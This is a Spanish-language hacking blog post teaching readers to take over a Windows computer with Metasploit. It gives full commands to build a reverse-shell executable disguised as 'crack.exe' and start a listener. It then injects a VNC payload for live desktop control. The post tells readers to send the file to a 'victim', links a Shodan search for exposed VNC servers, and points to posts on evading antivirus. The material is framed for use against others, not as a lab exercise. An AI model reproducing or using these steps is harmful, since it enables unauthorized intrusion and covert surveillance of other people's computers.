Saludos fieles lectores en este oportunidad aprenderemos a como controlar un ordenador remotamente mediante msfconsole o metasploit mediante una inyeccion payload VNC (Virtual Network computing), cuya función es controlar remotamente el ordenador comprometido y monitorearlo en vivo.
Referencia: https://es.wikipedia.org/wiki/VNC
Si desean pueden auditar o entrar a un servidor VNC por defauld, les daré un dork en shoudan
https://www.shodan.io/search?query=vnc+port%3A5901
PRIMER ESCENARIO: EXPLOTACIÓN
EL primero paso de obtener acceso a un ordenador, seria comprometerlo remotamente mediante ataques remotos o infecciones mediante payloads, dejare algunos POST donde enseño algunas técnicas para realizar algunas explotaciones.
http://backtrack-omar.blogspot.pe/2015/10/beef-browser-exploitation-framework.html
http://backtrack-omar.blogspot.pe/2015/10/unicorn-la-herramienta-de-infeccion.html
http://backtrack-omar.blogspot.pe/2015/10/winrar-nuestro-viejo-aliado-de.html
http://backtrack-omar.blogspot.pe/2015/09/2015-flash-0day-exploit-hackingteam.html
http://backtrack-omar.blogspot.pe/2015/03/las-viejas-macros-siempre-en-accion.html
http://backtrack-omar.blogspot.pe/2014/01/aprendiendo-metasploit-avanzado.html
no obstante existen mas métodos de infección y explotación que mas adelante añadiré al blog, pero creo que estos de aquí, les ayudara de mucho, lo primero que haré sera crear un payload ejecutable mediante msfvenom:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.179.129 LPORT=8080 -f exe > crack.exe
Luego de ello abriremos metasploit para activar nuestro servidor de escucha:
--------------------------------------------------------------------------------------------------------------------------
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.179.129
msf exploit(handler) > set lport 8080
msf exploit(handler) > exploit
--------------------------------------------------------------------------------------------------------------------------
el payload que hemos creado sera detectado por cualquier antivirus, si deseamos hacerlo indetectable pueden visitar mi siguiente POST:
http://backtrack-omar.blogspot.pe/2015/10/evadiendo-av-codificando-payloads-con.html
enviaremos el ejecutable a nuestra victima y solamente esperaremos a que la victima ejecute el archivo para tener acceso al sistema.
Para que puedan entenderlo una ves que tengamos acceso a un sistema tendremos la sesión de acuerdo al orden numero de cada conexión, como el primero se le otorga "session 1"
Lo que haremos sera tener acceso remoto para ello inyectaremos un payload que se enfoca en este proceso, pero antes saldremos de meterpreter, sin cerrar la sesión con el comando "background" para añadir el payload:
meterpreter > background
[*] Backgrounding session 1...
--------------------------------------------------------------------------------------------------------------------------
msf exploit(handler) > use windows/manage/payload_inject
msf post(payload_inject) > set HANDLER true
msf post(payload_inject) > set LHOST 192.168.179.129
msf post(payload_inject) > set PAYLOAD windows/vncinject/reverse_tcp
msf post(payload_inject) > set SESSION 1
msf post(payload_inject) > run
-------------------------------------------------------------------------------------------------------------------------
Si vemos la imagen no hay necesidad de explicar cada modulo que se ejecuta, ya que se simplifica solo, una ves cargada la conexión automáticamente tendremos el acceso de escritorio remoto:
Este escenario se ejecuto en windows 7 , de igual manera funciona en windows 8, 8.1 y 10 una clara prueba de ello, les mostrare una imagen comprometiendo a un 8.1.
con esto tiene acceso a controlar el ordenador, desde su sistema.
Espero sea de su agrado mis lectores, sin mas que decir espero les aya gustado y hayan aprendido algo nuevo gracias a este servidor.
Gracias al aporte de mi amigo Omar Rodriguez
No hay comentarios:
Publicar un comentario